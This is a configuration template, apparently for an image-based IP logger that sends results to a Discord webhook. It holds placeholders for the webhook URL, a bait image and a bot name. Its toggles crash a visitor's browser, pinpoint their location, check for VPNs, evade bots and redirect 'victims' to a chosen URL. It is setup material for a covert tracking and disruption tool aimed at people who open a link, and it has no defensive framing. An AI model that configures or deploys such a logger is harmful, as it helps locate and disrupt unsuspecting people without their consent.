Your Discord Webhook URL
DISCORD_WEBHOOK_URL=Discord_Webhook_URL_Here

Custom image to use for the logger
DEFAULT_IMAGE=Image_Link_Here

Change the bot name
BOT_USERNAME=Username_Here

Features (Set to true or false)
CRASH_BROWSER=false
ACCURATE_LOCATION=false
VPN_CHECK_LEVEL=1
LINK_ALERTS=true
BUGGED_IMAGE=true
ANTI_BOT_LEVEL=1

Where to redirect victims (Leave empty for no redirect)
REDIRECT_URL=""
CUSTOM_MESSAGE=""